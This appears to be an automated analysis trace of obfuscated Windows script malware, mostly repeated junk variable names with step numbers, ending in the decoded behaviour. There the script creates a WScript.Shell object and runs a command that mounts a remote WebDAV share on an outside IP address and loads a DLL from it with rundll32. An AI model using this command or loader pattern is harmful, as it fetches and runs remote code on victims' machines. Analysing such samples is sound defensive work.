                                                                        lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                          31
                                                                          lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                            32
                                                                            lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                              33
                                                                              lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                34
                                                                                lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                  35
                                                                                  lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                    36
                                                                                    lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                      37
                                                                                      lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                        38
                                                                                        lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                          39
                                                                                          lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                            40
                                                                                            lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                              41
                                                                                              lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                42
                                                                                                lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                  43
                                                                                                  lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                    44
                                                                                                    lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                      45
                                                                                                      lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                        46
                                                                                                        lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                          47
                                                                                                          lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                            48
                                                                                                            lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                              49
                                                                                                              lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                50
                                                                                                                lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                  51
                                                                                                                  lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                    52
                                                                                                                    lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                      53
                                                                                                                      lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                        54
                                                                                                                        lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                          55
                                                                                                                          lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                            56
                                                                                                                            lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                              57
                                                                                                                              lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                                58
                                                                                                                                lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                                  59
                                                                                                                                  lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                                    60
                                                                                                                                    lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                                      61
                                                                                                                                      lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                                        62
                                                                                                                                        lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                                                                                          63
                                                                                                                                          Function ( '' + lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxof...
                                                                                                                                          • Function("return this") ➔ function anonymous()
                                                                                                                                          • () ➔
                                                                                                                                          • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                          • run("cmd /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861...",0,false) ➔ 0
                                                                                                                                          Reset < >